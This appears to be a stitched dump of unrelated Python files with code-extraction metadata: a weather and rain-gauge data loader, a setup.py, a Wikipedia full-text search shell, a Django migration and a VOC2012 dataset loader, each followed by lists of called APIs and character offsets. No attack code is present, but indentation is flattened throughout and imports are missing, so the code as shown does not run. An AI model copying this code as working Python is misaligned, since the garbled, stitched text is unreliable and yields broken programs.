import time
import threading
import multiprocessing
def check_file(tt,datelist,hour):
'''
chech file at the time of 'tt' and its continuous 24 hours and histort hours
pretime 25 times include time.now()
history time include 'hour' times
return if file is ready at the time of 'tt'
'''
ruitufile = '/data/output/ruitu_data/{}/{}.npy'.format(tt.strftime('%Y%m'),tt.strftime('%Y%m%d%H'))
sign = os.path.exists(ruitufile)
if sign:
pass
# shape0 = np.load(ruitufile).shape[0]
# sign = sign and shape0==25
# if not shape0==25:
# print(ruitufile)
# os.remove(ruitufile)
else:
return False
pretimelist = [ tt+datetime.timedelta(seconds=3600*i) for i in range(25)]
pretimelist = pretimelist+ [ tt-datetime.timedelta(seconds=3600*i) for i in range(hour)]
for pretime in pretimelist:
# gaughDir = '/data/output/guance_data/{}/{}.npy'.format(pretime)
timestring = pretime.strftime("%Y%m%d%H%M")
sign = (timestring in datelist ) and sign
if sign==False :
# print(timestring,os.path.exists(ruitufile),timestring in datelist)
break
return sign
def file_dataset(hour ):
'''write a data-ready file list'''
print('creating the dataset with history ', hour, ' hours')
file_dict = pd.read_csv('/data/output/all_guance_data_name_list/all_gc_filename_list.csv',index_col=0)
datelist = [str(line).split('_')[1] for line in file_dict.values]
file_dict.index = datelist
start_time, end_time = datetime.datetime(2016,10,1,0),datetime.datetime(2019,4,1,0)
pretimelist=[]
pretime= start_time
while pretime<=end_time:
if check_file(pretime,datelist,hour):
pretimelist.append(pretime)
pretime += datetime.timedelta(seconds=3600*3)
pretimelist = np.array(pretimelist)
np.save('/data/code/ml/pretimelist_{}.npy'.format(hour),pretimelist)
print('finishing creating dataset with history ', hour, ' hours')
return None
def my_test_dataset( batch, history_hour, season=None ):
'''return list shape [number , batch]'''
file_dict = pd.read_csv('/data/output/all_guance_data_name_list/2019_04_07_gc_filename_list.csv', index_col=0)
datelist = [str(line).split('_')[1] for line in file_dict.values]
file_dict.index = datelist
target = '/data/code/ml/pretimelist_test_{}.npy'.format(history_hour)
if not os.path.exists(target):
file_test_dataset( history_hour )
pretimelist = np.load(target, allow_pickle=True)
if season=='summer':
tmp = []
for pretime in pretimelist:
if pretime.month in [4,5,6,7,8,9]:
tmp.append(pretime)
pretimelist = np.array(tmp)
print('dataset lenght',len(pretimelist))
pretimelist = pretimelist[:len(pretimelist)//batch*batch]
pretimelist = np.array(pretimelist).reshape(-1, batch)
return pretimelist, file_dict
def file_test_dataset(hour ):
'''write a data-ready file list'''
print('creating the dataset with history ', hour, ' hours')
file_dict = pd.read_csv('/data/output/all_guance_data_name_list/2019_04_07_gc_filename_list.csv',index_col=0)
datelist = [str(line).split('_')[1] for line in file_dict.values]
file_dict.index = datelist
start_time, end_time = datetime.datetime(2019,4,1,0),datetime.datetime(2019,7,31,21)
pretimelist=[]
pretime= start_time
while pretime<=end_time:
if check_file(pretime,datelist,hour):
pretimelist.append(pretime)
pretime += datetime.timedelta(seconds=3600*3)
pretimelist = np.array(pretimelist)
np.save('/data/code/ml/pretimelist_test_{}.npy'.format(hour),pretimelist)
print('finishing creating dataset with history ', hour, ' hours')
return None
def my_dataset( batch, history_hour, season=None ):
'''return list shape [number , batch]'''
file_dict = pd.read_csv('/data/output/all_guance_data_name_list/all_gc_filename_list.csv', index_col=0)
datelist = [str(line).split('_')[1] for line in file_dict.values]
file_dict.index = datelist
target = '/data/code/ml/pretimelist_{}.npy'.format(history_hour)
if not os.path.exists(target):
file_dataset( history_hour )
pretimelist = np.load(target, allow_pickle=True)
if season=='summer':
tmp = []
for pretime in pretimelist:
if pretime.month in [6,7,8,9]:
tmp.append(pretime)
pretimelist = np.array(tmp)
print('dataset lenght',len(pretimelist))
pretimelist = pretimelist[:len(pretimelist)//batch*batch]
random.shuffle(pretimelist)
pretimelist = np.array(pretimelist).reshape(-1, batch)
return pretimelist, file_dict
def conbime_thread(batch_list, batch_time):
'''
parallization the thread to read the data
'''
print("Sub-process(es) begin.")
ruitulist, gaugelist, histgaugelist, jobresults = [], [], [], []
pool = multiprocessing.Pool(processes=8)
for filelist, pretime in zip(batch_list, batch_time):
jobresults.append(pool.apply_async(read_one, (filelist, pretime)))
for res in jobresults:
ruituFile, gaugeFile, histgaugeFile = res.get()
ruitulist.append(ruituFile)
gaugelist.append(gaugeFile)
histgaugelist.append(histgaugeFile)
pool.close() # ๅ
ณ้ญ่ฟ็จๆฑ ๏ผ่กจ็คบไธ่ฝๅจๅพ่ฟ็จๆฑ ไธญๆทปๅ ่ฟ็จ
pool.join() # ็ญๅพ
่ฟ็จๆฑ ไธญ็ๆๆ่ฟ็จๆง่กๅฎๆฏ๏ผๅฟ
้กปๅจclose()ไนๅ่ฐ็จ
print("Sub-process(es) done.")
gaugelist, ruitulist, histgaugelist = np.array(gaugelist), np.array(ruitulist), np.array(histgaugelist)
# print(gaugelist.shape, ruitulist.shape, histgaugelist.shape)
return ruitulist, gaugelist, histgaugelist
def read_one(filelist, pretime):
'''read single data in training data with preprocessing '''
# tt = time.time()
ruituFile = np.load(filelist[0])[:,:,:80,:84]
# print('processing',pretime)
gaugeFile = np.array([np.load(file) for file in filelist[1:25]])[:,4:5,:80,:84]
histgaugeFile = np.array([np.load(file) for file in filelist[25:]])[:,:,:80,:84]
ruituFile, gaugeFile, histgaugeFile = norm_preprocess(ruituFile, gaugeFile, histgaugeFile, pretime)
# print(time.time()-tt)
return ruituFile, gaugeFile, histgaugeFile
def norm_preprocess(ruituFile, gaugeFile, histgaugeFile, pretime):
'''
processing with abnormal values, time , geography values, normalized values.
'''
# print(ruituFile.shape, gaugeFile.shape, histgaugeFile.shape)
#remoev the abnormal value
assert ruituFile.shape[0]==25,print(pretime,'without full prediction')
if (np.abs(ruituFile) > 10000).any():
meantmp = ruituFile.mean(axis=(0,2,3))
for i in range(ruituFile.shape[1]):
ruituFile[:,i,:,:][np.abs(ruituFile[:,i,:,:])>10000] = meantmp[i]
histgaugeFile[np.isnan(histgaugeFile)]=200000
if (np.abs(histgaugeFile) > 10000).any():
meantmp = histgaugeFile.mean(axis=(0,2,3))
for i in range(histgaugeFile.shape[1]):
histgaugeFile[:,i,:,:][np.abs(histgaugeFile[:,i,:,:])>10000] = meantmp[i]
#normal the value
ruituInfo = pd.read_csv('/data/output/ruitu_info.csv')
ruitu_mean, ruitu_std = np.ones_like(ruituFile),np.ones_like(ruituFile)
for i in range(len(ruituInfo)):
ruitu_mean[:,i,:,:] *= ruituInfo['mean'].iloc[i]
ruitu_std[:,i,:,:] *= ruituInfo['std'].iloc[i]
ruituFile = (ruituFile-ruitu_mean)/ruitu_std
gaugeInfo = pd.read_csv('/data/output/gauge_info.csv')
gauge_mean, gauge_std = np.ones_like(histgaugeFile),np.ones_like(histgaugeFile)
for i in range(len(gaugeInfo)):
gauge_mean[:,i,:,:] *= gaugeInfo['mean'].iloc[i]
gauge_std[:,i,:,:] *= gaugeInfo['std'].iloc[i]
histgaugeFile = (histgaugeFile-gauge_mean)/gauge_std
#add time and geo info
geoinfo = np.load('/data/output/height_norm.npy')
hist_hour = histgaugeFile.shape[0]
pretimelist = [pretime+datetime.timedelta(seconds=i*3600) for i in range(-hist_hour+1, 25)]
yearvariancelist = [ np.sin(2*np.pi*(tt.toordinal()-730180)/365.25) for tt in pretimelist]
dayvariancelist = [ np.sin(2*np.pi*(tt.hour-3)/24) for tt in pretimelist]
ruituFile[1:25, 32:35, :, :] = ruituFile[1:25, 32:35, :, :] - ruituFile[0:24,32:35,:,:]
ruituFile_new = ruituFile[1:].copy()
histgaugeFile[:,7,:,:] = np.array([geoinfo]*histgaugeFile.shape[0])
histgaugeFile[:,10,:,:] = np.array([sli*yvar for sli, yvar in zip(np.ones([hist_hour,80,84]),yearvariancelist[:hist_hour])])
histgaugeFile[:,11,:,:] = np.array([sli*dvar for sli, dvar in zip(np.ones([hist_hour,80,84]),dayvariancelist[:hist_hour])])
tmpyear = np.expand_dims([sli*yvar for sli, yvar in zip(np.ones([24,80,84]),yearvariancelist[hist_hour:])], axis=1)
tmpday = np.expand_dims([sli*dvar for sli, dvar in zip(np.ones([24,80,84]),dayvariancelist[hist_hour:])], axis=1)
tmpgeo = np.expand_dims(np.array([geoinfo]*ruituFile_new.shape[0]),axis=1)
ruituFile_new = np.concatenate((ruituFile_new, tmpyear, tmpday, tmpgeo),axis=1)
# print(ruituFile_new.shape, gaugeFile.shape, histgaugeFile.shape)
return ruituFile_new, gaugeFile, histgaugeFile
def load_data2(pretimelist, file_dict, history_hour, binary=False):
'''
load batch data in parallized way, more faster.
input args: load_data2(pretimelist, file_dict, history_hour, binary=False)
return args: ruitudata, gaugedata, histgaugedata
shape: [batch ,24, channels_1, height, width],[batch ,24 , 1, height, width],[batch , historyhour, channels_2, height, width]
if binary is True, the gaugedata will return in shape [batch ,time, 2, height, width]
'''
pretimelist = list(pretimelist)
batchfile = []
for batch_time in pretimelist:
ruituFile = ['/data/output/ruitu_data/{}/{}.npy'.format(batch_time.strftime('%Y%m'),batch_time.strftime('%Y%m%d%H'))]
time24h = [ batch_time+datetime.timedelta(seconds=3600*i) for i in range(1,25)]
gaugeFile = ['/data/output/guance_data/{}/{}'.format(tt.strftime('%Y%m'),file_dict.loc[tt.strftime('%Y%m%d%H%M')].values[0]) for tt in time24h]
timehist = [ batch_time-datetime.timedelta(seconds=3600*i) for i in range(history_hour)]
histgaugeFile = ['/data/output/guance_data/{}/{}'.format(tt.strftime('%Y%m'),file_dict.loc[tt.strftime('%Y%m%d%H%M')].values[0]) for tt in timehist]
singlefile = ruituFile+gaugeFile+histgaugeFile
batchfile.append(singlefile)
ruitudata, gaugedata, histgaugedata = conbime_thread(batchfile, pretimelist)
if binary:
# gaugedata = (gaugedata>=0.1).astype('int')
gaugebinary = np.concatenate((gaugedata>=0.1, gaugedata<0.1),axis=2).astype('int')
gaugedata[ gaugedata<0.1]=0
return np.array(ruitudata)[:,:,:,:80,:80], np.array(gaugebinary)[:,:,:,:80,:80], np.array(gaugedata[:,:,:,:80,:80])
# def load_data(pretimelist,file_dict):
# '''pretimelist is a batch timelist at once
# output shape = [batch, 24, channel, 80, 84],[batch, 24, channel, 80, 84]
# '''
# print('old')
# t1 = time.time()
# pretimelist = list(pretimelist)
# gaugedata = []
# ruitudata = []
# for batch_time in pretimelist:
# ruitutmp = np.load('/data/output/ruitu_data/{}/{}.npy'.format(batch_time.strftime('%Y%m'),batch_time.strftime('%Y%m%d%H')))[:24,:,:80,:84]
# time24h = [ batch_time+datetime.timedelta(seconds=3600) for i in range(24)]
# guagetmp = np.array([np.load('/data/output/guance_data/{}/{}'.format(tt.strftime('%Y%m'),file_dict.loc[tt.strftime('%Y%m%d%H%M')].values[0])) for tt in time24h])[:,4:5,:80,:84]
# gaugedata.append(guagetmp)
# ruitudata.append(ruitutmp)
# print('total:',time.time()-t1)
# return np.array(gaugedata), np.array(ruitudata)
if __name__=='__main__':
batch = 8
historyhour = 24
batch_filelist, file_dict = my_dataset( batch, historyhour,season='summer')
split_num=0.7
train_num = int(len(batch_filelist)*split_num)
mydataset = {'train':batch_filelist[:train_num], 'test': batch_filelist[train_num:]}
for filelist in mydataset['train']:
tt = time.time()
ruitudata, gaugedata, histgaugedata = load_data2(filelist,file_dict,historyhour, binary=True)
print(gaugedata.shape, ruitudata.shape, histgaugedata.shape, 'finished time cost:',time.time()-tt)
# print(gaugedata.mean(axis=(0,1,3,4)),gaugedata.std(axis=(0,1,3,4)))
# print(ruitudata.mean(axis=(0,1,3,4)),ruitudata.std(axis=(0,1,3,4)))
# print(histgaugedata.mean(axis=(0,1,3,4)),histgaugedata.std(axis=(0,1,3,4)))
|
[
"numpy.load",
"numpy.ones_like",
"numpy.abs",
"pandas.read_csv",
"random.shuffle",
"os.path.exists",
"numpy.ones",
"numpy.isnan",
"datetime.datetime",
"time.time",
"numpy.sin",
"numpy.array",
"datetime.timedelta",
"multiprocessing.Pool",
"numpy.concatenate"
] |
[((593, 618), 'os.path.exists', 'os.path.exists', (['ruitufile'], {}), '(ruitufile)\n', (607, 618), False, 'import os\n'), ((1522, 1617), 'pandas.read_csv', 'pd.read_csv', (['"""/data/output/all_guance_data_name_list/all_gc_filename_list.csv"""'], {'index_col': '(0)'}), "('/data/output/all_guance_data_name_list/all_gc_filename_list.csv',\n index_col=0)\n", (1533, 1617), True, 'import pandas as pd\n'), ((2033, 2054), 'numpy.array', 'np.array', (['pretimelist'], {}), '(pretimelist)\n', (2041, 2054), True, 'import numpy as np\n'), ((2333, 2440), 'pandas.read_csv', 'pd.read_csv', (['"""/data/output/all_guance_data_name_list/2019_04_07_gc_filename_list.csv"""'], {'index_col': '(0)'}), "(\n '/data/output/all_guance_data_name_list/2019_04_07_gc_filename_list.csv',\n index_col=0)\n", (2344, 2440), True, 'import pandas as pd\n'), ((2702, 2736), 'numpy.load', 'np.load', (['target'], {'allow_pickle': '(True)'}), '(target, allow_pickle=True)\n', (2709, 2736), True, 'import numpy as np\n'), ((3289, 3396), 'pandas.read_csv', 'pd.read_csv', (['"""/data/output/all_guance_data_name_list/2019_04_07_gc_filename_list.csv"""'], {'index_col': '(0)'}), "(\n '/data/output/all_guance_data_name_list/2019_04_07_gc_filename_list.csv',\n index_col=0)\n", (3300, 3396), True, 'import pandas as pd\n'), ((3808, 3829), 'numpy.array', 'np.array', (['pretimelist'], {}), '(pretimelist)\n', (3816, 3829), True, 'import numpy as np\n'), ((4109, 4204), 'pandas.read_csv', 'pd.read_csv', (['"""/data/output/all_guance_data_name_list/all_gc_filename_list.csv"""'], {'index_col': '(0)'}), "('/data/output/all_guance_data_name_list/all_gc_filename_list.csv',\n index_col=0)\n", (4120, 4204), True, 'import pandas as pd\n'), ((4461, 4495), 'numpy.load', 'np.load', (['target'], {'allow_pickle': '(True)'}), '(target, allow_pickle=True)\n', (4468, 4495), True, 'import numpy as np\n'), ((4805, 4832), 'random.shuffle', 'random.shuffle', (['pretimelist'], {}), '(pretimelist)\n', (4819, 4832), False, 'import random\n'), ((5151, 5184), 'multiprocessing.Pool', 'multiprocessing.Pool', ([], {'processes': '(8)'}), '(processes=8)\n', (5171, 5184), False, 'import multiprocessing\n'), ((7309, 7351), 'pandas.read_csv', 'pd.read_csv', (['"""/data/output/ruitu_info.csv"""'], {}), "('/data/output/ruitu_info.csv')\n", (7320, 7351), True, 'import pandas as pd\n'), ((7642, 7684), 'pandas.read_csv', 'pd.read_csv', (['"""/data/output/gauge_info.csv"""'], {}), "('/data/output/gauge_info.csv')\n", (7653, 7684), True, 'import pandas as pd\n'), ((8020, 8059), 'numpy.load', 'np.load', (['"""/data/output/height_norm.npy"""'], {}), "('/data/output/height_norm.npy')\n", (8027, 8059), True, 'import numpy as np\n'), ((8530, 8574), 'numpy.array', 'np.array', (['([geoinfo] * histgaugeFile.shape[0])'], {}), '([geoinfo] * histgaugeFile.shape[0])\n', (8538, 8574), True, 'import numpy as np\n'), ((9167, 9231), 'numpy.concatenate', 'np.concatenate', (['(ruituFile_new, tmpyear, tmpday, tmpgeo)'], {'axis': '(1)'}), '((ruituFile_new, tmpyear, tmpday, tmpgeo), axis=1)\n', (9181, 9231), True, 'import numpy as np\n'), ((1742, 1775), 'datetime.datetime', 'datetime.datetime', (['(2016)', '(10)', '(1)', '(0)'], {}), '(2016, 10, 1, 0)\n', (1759, 1775), False, 'import datetime\n'), ((1773, 1805), 'datetime.datetime', 'datetime.datetime', (['(2019)', '(4)', '(1)', '(0)'], {}), '(2019, 4, 1, 0)\n', (1790, 1805), False, 'import datetime\n'), ((1980, 2016), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(3600 * 3)'}), '(seconds=3600 * 3)\n', (1998, 2016), False, 'import datetime\n'), ((2618, 2640), 'os.path.exists', 'os.path.exists', (['target'], {}), '(target)\n', (2632, 2640), False, 'import os\n'), ((2925, 2938), 'numpy.array', 'np.array', (['tmp'], {}), '(tmp)\n', (2933, 2938), True, 'import numpy as np\n'), ((3516, 3548), 'datetime.datetime', 'datetime.datetime', (['(2019)', '(4)', '(1)', '(0)'], {}), '(2019, 4, 1, 0)\n', (3533, 3548), False, 'import datetime\n'), ((3546, 3580), 'datetime.datetime', 'datetime.datetime', (['(2019)', '(7)', '(31)', '(21)'], {}), '(2019, 7, 31, 21)\n', (3563, 3580), False, 'import datetime\n'), ((3755, 3791), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(3600 * 3)'}), '(seconds=3600 * 3)\n', (3773, 3791), False, 'import datetime\n'), ((4382, 4404), 'os.path.exists', 'os.path.exists', (['target'], {}), '(target)\n', (4396, 4404), False, 'import os\n'), ((4680, 4693), 'numpy.array', 'np.array', (['tmp'], {}), '(tmp)\n', (4688, 4693), True, 'import numpy as np\n'), ((5684, 5703), 'numpy.array', 'np.array', (['gaugelist'], {}), '(gaugelist)\n', (5692, 5703), True, 'import numpy as np\n'), ((5705, 5724), 'numpy.array', 'np.array', (['ruitulist'], {}), '(ruitulist)\n', (5713, 5724), True, 'import numpy as np\n'), ((5726, 5749), 'numpy.array', 'np.array', (['histgaugelist'], {}), '(histgaugelist)\n', (5734, 5749), True, 'import numpy as np\n'), ((6003, 6023), 'numpy.load', 'np.load', (['filelist[0]'], {}), '(filelist[0])\n', (6010, 6023), True, 'import numpy as np\n'), ((7000, 7023), 'numpy.isnan', 'np.isnan', (['histgaugeFile'], {}), '(histgaugeFile)\n', (7008, 7023), True, 'import numpy as np\n'), ((7380, 7403), 'numpy.ones_like', 'np.ones_like', (['ruituFile'], {}), '(ruituFile)\n', (7392, 7403), True, 'import numpy as np\n'), ((7404, 7427), 'numpy.ones_like', 'np.ones_like', (['ruituFile'], {}), '(ruituFile)\n', (7416, 7427), True, 'import numpy as np\n'), ((7713, 7740), 'numpy.ones_like', 'np.ones_like', (['histgaugeFile'], {}), '(histgaugeFile)\n', (7725, 7740), True, 'import numpy as np\n'), ((7741, 7768), 'numpy.ones_like', 'np.ones_like', (['histgaugeFile'], {}), '(histgaugeFile)\n', (7753, 7768), True, 'import numpy as np\n'), ((8314, 8352), 'numpy.sin', 'np.sin', (['(2 * np.pi * (tt.hour - 3) / 24)'], {}), '(2 * np.pi * (tt.hour - 3) / 24)\n', (8320, 8352), True, 'import numpy as np\n'), ((9096, 9140), 'numpy.array', 'np.array', (['([geoinfo] * ruituFile_new.shape[0])'], {}), '([geoinfo] * ruituFile_new.shape[0])\n', (9104, 9140), True, 'import numpy as np\n'), ((11018, 11056), 'numpy.array', 'np.array', (['gaugedata[:, :, :, :80, :80]'], {}), '(gaugedata[:, :, :, :80, :80])\n', (11026, 11056), True, 'import numpy as np\n'), ((12345, 12356), 'time.time', 'time.time', ([], {}), '()\n', (12354, 12356), False, 'import time\n'), ((878, 914), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(3600 * i)'}), '(seconds=3600 * i)\n', (896, 914), False, 'import datetime\n'), ((3064, 3085), 'numpy.array', 'np.array', (['pretimelist'], {}), '(pretimelist)\n', (3072, 3085), True, 'import numpy as np\n'), ((4851, 4872), 'numpy.array', 'np.array', (['pretimelist'], {}), '(pretimelist)\n', (4859, 4872), True, 'import numpy as np\n'), ((8126, 8162), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(i * 3600)'}), '(seconds=i * 3600)\n', (8144, 8162), False, 'import datetime\n'), ((10944, 10963), 'numpy.array', 'np.array', (['ruitudata'], {}), '(ruitudata)\n', (10952, 10963), True, 'import numpy as np\n'), ((10980, 11001), 'numpy.array', 'np.array', (['gaugebinary'], {}), '(gaugebinary)\n', (10988, 11001), True, 'import numpy as np\n'), ((969, 1005), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(3600 * i)'}), '(seconds=3600 * i)\n', (987, 1005), False, 'import datetime\n'), ((6097, 6110), 'numpy.load', 'np.load', (['file'], {}), '(file)\n', (6104, 6110), True, 'import numpy as np\n'), ((6185, 6198), 'numpy.load', 'np.load', (['file'], {}), '(file)\n', (6192, 6198), True, 'import numpy as np\n'), ((6766, 6783), 'numpy.abs', 'np.abs', (['ruituFile'], {}), '(ruituFile)\n', (6772, 6783), True, 'import numpy as np\n'), ((7040, 7061), 'numpy.abs', 'np.abs', (['histgaugeFile'], {}), '(histgaugeFile)\n', (7046, 7061), True, 'import numpy as np\n'), ((10095, 10131), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(3600 * i)'}), '(seconds=3600 * i)\n', (10113, 10131), False, 'import datetime\n'), ((10336, 10372), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(3600 * i)'}), '(seconds=3600 * i)\n', (10354, 10372), False, 'import datetime\n'), ((10827, 10886), 'numpy.concatenate', 'np.concatenate', (['(gaugedata >= 0.1, gaugedata < 0.1)'], {'axis': '(2)'}), '((gaugedata >= 0.1, gaugedata < 0.1), axis=2)\n', (10841, 10886), True, 'import numpy as np\n'), ((12550, 12561), 'time.time', 'time.time', ([], {}), '()\n', (12559, 12561), False, 'import time\n'), ((6922, 6951), 'numpy.abs', 'np.abs', (['ruituFile[:, i, :, :]'], {}), '(ruituFile[:, i, :, :])\n', (6928, 6951), True, 'import numpy as np\n'), ((7212, 7245), 'numpy.abs', 'np.abs', (['histgaugeFile[:, i, :, :]'], {}), '(histgaugeFile[:, i, :, :])\n', (7218, 7245), True, 'import numpy as np\n'), ((8643, 8671), 'numpy.ones', 'np.ones', (['[hist_hour, 80, 84]'], {}), '([hist_hour, 80, 84])\n', (8650, 8671), True, 'import numpy as np\n'), ((8772, 8800), 'numpy.ones', 'np.ones', (['[hist_hour, 80, 84]'], {}), '([hist_hour, 80, 84])\n', (8779, 8800), True, 'import numpy as np\n'), ((8890, 8911), 'numpy.ones', 'np.ones', (['[24, 80, 84]'], {}), '([24, 80, 84])\n', (8897, 8911), True, 'import numpy as np\n'), ((9009, 9030), 'numpy.ones', 'np.ones', (['[24, 80, 84]'], {}), '([24, 80, 84])\n', (9016, 9030), True, 'import numpy as np\n')]
|
import setuptools
setuptools.setup(
name="math-algorithm-models",
version="0.0.1",
author="<NAME>",
author_email="<EMAIL>",
license="MIT",
description="simple algorithms executor",
long_description=open("README.md", "rt").read(),
long_description_content_type="text/markdown",
url="https://github.com/RullDeef/MarkovAlgorifms",
package_dir={"": "src"},
packages=setuptools.find_packages("src"),
entry_points={"console_scripts": ["matalg=matalg.executor:main"]},
setup_requires=["pytest-runner"],
tests_require=["pytest"]
)
|
[
"setuptools.find_packages"
] |
[((407, 438), 'setuptools.find_packages', 'setuptools.find_packages', (['"""src"""'], {}), "('src')\n", (431, 438), False, 'import setuptools\n')]
|
#!/usr/bin/env python3
import time
import cmd
import sys
import gzip
import functools
import re
import xml.etree.ElementTree as ElementTree
from typing import List, Set, Dict, Iterator
from tqdm import tqdm
class Document:
def __init__(self, doc_id, title, url, abstract):
self.doc_id = doc_id
self.title = title
self.url = url
self.abstract = abstract
def __repr__(self):
return '<Document id = "{}", title = "{}", url = "{}", abstract = "{}">'.format(
self.doc_id, self.title, self.url, self.abstract)
def measure_time(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
start_time = time.time()
result = func(*args, **kwargs)
end_time = time.time()
print("Elapsed time: {} seconds".format(end_time - start_time))
return result
return wrapper
def load_documents(file_path: str) -> Iterator[Document]:
doc_id = 0
with gzip.open(file_path, "r") as input:
tree = ElementTree.iterparse(input)
for event, elem in tree:
if elem.tag == "doc":
doc_id += 1
title = elem.find('title').text
url = elem.find('url').text
abstract = elem.find('abstract').text
yield Document(doc_id, title, url, abstract)
def tokenizer(text: str) -> List[str]:
return re.findall(r"\w[\w']*\w|\w", text)
def filter_stopwords(tokens: List[str]) -> List[str]:
global stopwords
if not stopwords:
stopwords = set()
with open('stopwords.txt') as f:
stopwords = set([w.strip('\n') for w in f.readlines()])
return list(filter(lambda w: w not in stopwords, tokens))
def analyze(text: str) -> List[str]:
if text is None or len(text) == 0:
return []
from nltk.stem import PorterStemmer
stemmer = PorterStemmer()
tokens = filter_stopwords([token.lower() for token in tokenizer(text)])
tokens = [stemmer.stem(w) for w in tokens]
return tokens
@measure_time
def index_documents(docs: List[Document]):
global index
for doc in tqdm(docs):
for token in analyze(doc.abstract):
if (token in index) and index[token][-1] == doc.doc_id:
continue
index.setdefault(token, []).append(doc.doc_id)
@measure_time
def search(term: str) -> List[Document]:
doc_idx = []
for token in analyze(term):
if token in index:
doc_idx.append(set(index[token]))
return doc_idx
class FTSShell(cmd.Cmd):
intro = 'Full text search. Type help or ? to list commands.\n'
prompt = '>> '
data = {'wikipedia': 'enwiki-latest-abstract1.xml.gz'}
def do_data(self, arg):
'Show all text data'
print(data)
def do_load(self, arg):
'Load data for search'
if arg not in FTSShell.data:
print("Data does not exist! Please choose below dataset")
print(FTSShell.data)
return
self.data = FTSShell.data[arg]
print("Loading data [{}] ...".format(self.data))
self.docs_iterator = load_documents(self.data)
def do_index(self, arg):
'Index loaded data'
self.docs = {}
for doc in self.docs_iterator:
self.docs[doc.doc_id] = doc
index_documents(self.docs.values())
def do_search(self, arg):
'Search for keywords'
try:
print("Searching for: {} in {}".format(arg, self.data))
result_sets = search(arg)
result = set.intersection(*result_sets)
print("====== Found {} documents ======".format(len(result)))
for ids in result:
print(self.docs[ids])
except AttributeError:
print("Data needed to be loaded before searching. [help load] for more detail")
def do_EOF(self, arg):
'Return from this shell'
print('\nGood bye!')
return True
def emptyline(self):
pass
if __name__ == "__main__":
index = dict()
stopwords = set()
FTSShell().cmdloop()
|
[
"tqdm.tqdm",
"xml.etree.ElementTree.iterparse",
"gzip.open",
"nltk.stem.PorterStemmer",
"time.time",
"re.findall",
"functools.wraps"
] |
[((600, 621), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (615, 621), False, 'import functools\n'), ((1390, 1427), 're.findall', 're.findall', (['"""\\\\w[\\\\w\']*\\\\w|\\\\w"""', 'text'], {}), '("\\\\w[\\\\w\']*\\\\w|\\\\w", text)\n', (1400, 1427), False, 'import re\n'), ((1872, 1887), 'nltk.stem.PorterStemmer', 'PorterStemmer', ([], {}), '()\n', (1885, 1887), False, 'from nltk.stem import PorterStemmer\n'), ((2120, 2130), 'tqdm.tqdm', 'tqdm', (['docs'], {}), '(docs)\n', (2124, 2130), False, 'from tqdm import tqdm\n'), ((677, 688), 'time.time', 'time.time', ([], {}), '()\n', (686, 688), False, 'import time\n'), ((747, 758), 'time.time', 'time.time', ([], {}), '()\n', (756, 758), False, 'import time\n'), ((956, 981), 'gzip.open', 'gzip.open', (['file_path', '"""r"""'], {}), "(file_path, 'r')\n", (965, 981), False, 'import gzip\n'), ((1007, 1035), 'xml.etree.ElementTree.iterparse', 'ElementTree.iterparse', (['input'], {}), '(input)\n', (1028, 1035), True, 'import xml.etree.ElementTree as ElementTree\n')]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2018-03-16 05:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('imageflow', '0008_remove_reduction_image_companion'),
]
operations = [
migrations.RemoveField(
model_name='imageanalysis',
name='target_name',
),
]
|
[
"django.db.migrations.RemoveField"
] |
[((307, 377), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""imageanalysis"""', 'name': '"""target_name"""'}), "(model_name='imageanalysis', name='target_name')\n", (329, 377), False, 'from django.db import migrations\n')]
|
#!/usr/bin/env python3
#
# Copyright 2021 Graviti. Licensed under MIT License.
#
# pylint: disable=invalid-name
"""Dataloader of VOC2012Detection dataset."""
import os
from tensorbay.dataset import Dataset
from tensorbay.opendataset._utility import get_boolean_attributes, get_voc_detection_data
DATASET_NAME = "VOC2012Detection"
_SEGMENT_NAMES = ("train", "val")
def VOC2012Detection(path: str) -> Dataset:
"""`VOC2012Detection <http://host.robots.ox.ac.uk/pascal/VOC/voc2012/>`_ dataset.
The file structure should be like::
<path>
Annotations/
<image_name>.xml
...
JPEGImages/
<image_name>.jpg
...
ImageSets/
Main/
train.txt
val.txt
...
...
...
Arguments:
path: The root directory of the dataset.
Returns:
Loaded :class: `~tensorbay.dataset.dataset.Dataset` instance.
"""
root_path = os.path.abspath(os.path.expanduser(path))
annotation_path = os.path.join(root_path, "Annotations")
image_path = os.path.join(root_path, "JPEGImages")
main_path = os.path.join(root_path, "ImageSets", "Main")
dataset = Dataset(DATASET_NAME)
dataset.load_catalog(os.path.join(os.path.dirname(__file__), "catalog.json"))
boolean_attributes = get_boolean_attributes(dataset.catalog.box2d)
for segment_name in _SEGMENT_NAMES:
segment = dataset.create_segment(segment_name)
with open(os.path.join(main_path, f"{segment_name}.txt"), encoding="utf-8") as fp:
for stem in fp:
segment.append(
get_voc_detection_data(
stem.rstrip(), image_path, annotation_path, boolean_attributes
)
)
return dataset
|
[
"os.path.expanduser",
"os.path.dirname",
"tensorbay.opendataset._utility.get_boolean_attributes",
"tensorbay.dataset.Dataset",
"os.path.join"
] |
